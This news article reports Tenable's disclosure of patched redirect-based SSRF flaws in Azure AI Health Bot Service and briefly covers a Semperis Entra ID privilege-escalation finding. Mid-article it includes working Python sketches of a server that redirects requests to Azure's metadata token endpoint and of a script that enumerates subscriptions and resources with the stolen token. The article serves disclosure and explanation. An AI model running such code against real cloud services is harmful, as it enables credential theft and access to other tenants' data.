Researchers Uncover Vulnerabilities in AI-Powered Azure Health Bot Service

Aug 13, 2024 | Ravie Lakshmanan | Healthcare / Vulnerability

Cybersecurity researchers have discovered two security flaws in Microsoft’s Azure Health Bot Service that, if exploited, could permit a malicious actor to achieve lateral movement within customer environments and access sensitive patient data.

The critical issues, now patched by Microsoft, could have allowed access to cross-tenant resources within the service, Tenable said in a new report shared with The Hacker News.

The Azure AI Health Bot Service is a cloud platform that enables developers in healthcare organizations to build and deploy AI-powered virtual health assistants and create copilots to manage administrative workloads and engage with their patients.

This includes bots created by insurance service providers to allow customers to look up the status of a claim and ask questions about benefits and services, as well as bots managed by healthcare entities to help patients find appropriate care or look up nearby doctors.


Tenable's research specifically focuses on one aspect of the Azure AI Health Bot Service called Data Connections, which, as the name implies, offers a mechanism for integrating data from external sources, whether third-party services or the service providers' own API endpoints.

While the feature has built-in safeguards to prevent unauthorized access to internal APIs, further investigation found that these protections could be bypassed by issuing redirect responses (i.e., 301 or 302 status codes) when configuring a data connection using an external host under one’s control.

By configuring the host to answer requests with a 301 redirect pointing at Azure's Instance Metadata Service (IMDS), Tenable said it was possible to obtain a valid metadata response and then acquire an access token for management.azure[.]com.
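To make the redirect trick concrete, the following is a minimal sketch (not Tenable's actual proof-of-concept) of an attacker-controlled web server that answers the data connection's outbound request with a 301 pointing at the documented IMDS token endpoint. The host, port, and class name are illustrative; note that IMDS also expects a "Metadata: true" request header, which the client following the redirect would need to supply.

# Sketch only: an external host that replies to every GET with a 301 whose
# Location is Azure's IMDS token endpoint, so a service-side HTTP client that
# follows redirects ends up querying the internal metadata service on the
# attacker's behalf. Host/port are placeholders.
from http.server import BaseHTTPRequestHandler, HTTPServer

IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01"
    "&resource=https://management.azure.com/"
)

class RedirectToIMDS(BaseHTTPRequestHandler):
    def do_GET(self):
        # Issue a permanent redirect into the internal metadata endpoint.
        self.send_response(301)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectToIMDS).serve_forever()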

The token could then be used to list the subscriptions it grants access to via a call to a Microsoft endpoint, which returns an internal subscription ID that could, in turn, be used to enumerate the accessible resources through another API call.
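As an illustration of the kind of follow-on enumeration such a token permits, the sketch below calls the publicly documented Azure Resource Manager REST endpoints for listing subscriptions and their resources. The token value is a placeholder, and the API versions shown are documented ones, not necessarily those used in Tenable's research.

# Sketch only: enumerate subscriptions visible to a management.azure.com
# bearer token, then list the resources in each subscription.
import requests

ARM = "https://management.azure.com"
TOKEN = "<access token obtained via IMDS>"  # placeholder
HEADERS = {"Authorization": f"Bearer {TOKEN}"}

# List subscriptions the token's identity can see.
subs = requests.get(
    f"{ARM}/subscriptions?api-version=2022-12-01", headers=HEADERS
).json()

for sub in subs.get("value", []):
    sub_id = sub["subscriptionId"]
    # List the resources reachable within that subscription.
    resources = requests.get(
        f"{ARM}/subscriptions/{sub_id}/resources?api-version=2021-04-01",
        headers=HEADERS,
    ).json()
    for res in resources.get("value", []):
        print(sub_id, res["type"], res["name"])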

Separately, another endpoint related to integrating systems that support the Fast Healthcare Interoperability Resources (FHIR) data exchange format was found to be susceptible to the same attack.

Tenable said it reported its findings to Microsoft in June and July 2024, following which the Windows maker began rolling out fixes to all regions. There is no evidence that the issue was exploited in the wild.


“The vulnerabilities raise concerns about how chatbots can be exploited to reveal sensitive information,” Tenable said in a statement. “In particular, the vulnerabilities involved a flaw in the underlying architecture of the chatbot service, highlighting the importance of traditional web app and cloud security in the age of AI chatbots.”

The disclosure comes days after Semperis detailed an attack technique called UnOAuthorized that allows for privilege escalation using Microsoft Entra ID (formerly Azure Active Directory), including the ability to add and remove users from privileged roles. Microsoft has since plugged the security hole.

“A threat actor could have used such access to perform privilege elevation to Global Administrator and install further means of persistence in a tenant,” security researcher Eric Woodruff said. “An attacker could also use this access to perform lateral movement into any system in Microsoft 365 or Azure, as well as any SaaS application connected to Entra ID.”
